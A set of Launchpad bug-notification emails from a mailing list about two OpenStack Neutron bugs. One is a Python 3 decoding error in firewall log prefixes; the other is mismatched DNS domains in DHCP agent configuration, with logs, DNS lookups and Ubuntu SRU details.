** Also affects: neutron-fwaas (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Disco) Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Cosmic) Importance: Undecided Status: New ** Description changed: Under Python 3, the prefix of a firewall log message is not correctly - decode: + decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: incorrect decode of log prefix under python 3 Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: New Status in neutron-fwaas source package in Cosmic: New Status in neutron-fwaas source package in Disco: New Status in neutron-fwaas source package in Eoan: New Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
Illustrated: >>> str(b'10612530182266949194') "b'10612530182266949194'" >>> b'10612530182266949194'.decode('UTF-8') '10612530182266949194' ** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: incorrect decode of log prefix under python 3 Status in neutron: New Status in neutron-fwaas package in Ubuntu: New Bug description: Under Python 3, the prefix of a firewall log message is not correctly decode: 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
Ubuntu SRU information [Impact] Use of Neutron internal DNS resolution for resolution of instances attached to the same project network is inconsistent due to use of configuration options for the actual hostname entries in the dnsmasq hosts file paired with the network 'dns_domain' attribute which is used to set the search path for the same dnsmasq instance. [Test Case] Deploy OpenStack with Neutron internal DNS support enabled Configure neutron with a dns_domain of 'testcase.internal' Set a dns_domain attribute on the project network ('designate.local') Boot an instance attached to the network DNS resolution within the host will be asymmetric in terms of the actual dns domain used. root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.testcase.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 which should be root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.testcase.local has address 192.168.21.222 [Regression Potential] Minimal; the proposed fix actually reverts changes in Neutron which altered the behaviour of the internal DNS support in Neutron incorrectly. [Other Info] This change in behaviour has been discussed at the upstream Neutron irc meeting with consensus that the behaviour changes are incorrect and should be reverted. ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/queens Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive queens series: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: New Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Triaged Status in neutron source package in Cosmic: Triaged Status in neutron source package in Disco: Triaged Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Also affects: neutron (Ubuntu Disco) Importance: Undecided Status: New ** Also affects: neutron (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: neutron (Ubuntu Bionic) Importance: Undecided Status: New ** Also affects: neutron (Ubuntu Cosmic) Importance: Undecided Status: New ** Changed in: neutron (Ubuntu Bionic) Status: New => Triaged -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in neutron: In Progress Status in neutron package in Ubuntu: New Status in neutron source package in Bionic: Triaged Status in neutron source package in Cosmic: New Status in neutron source package in Disco: New Status in neutron source package in Eoan: New Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Also affects: neutron (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] [NEW] dhcp agent configured with mismatching domain and host entries
Public bug reported: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. ** Affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in neutron: New Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp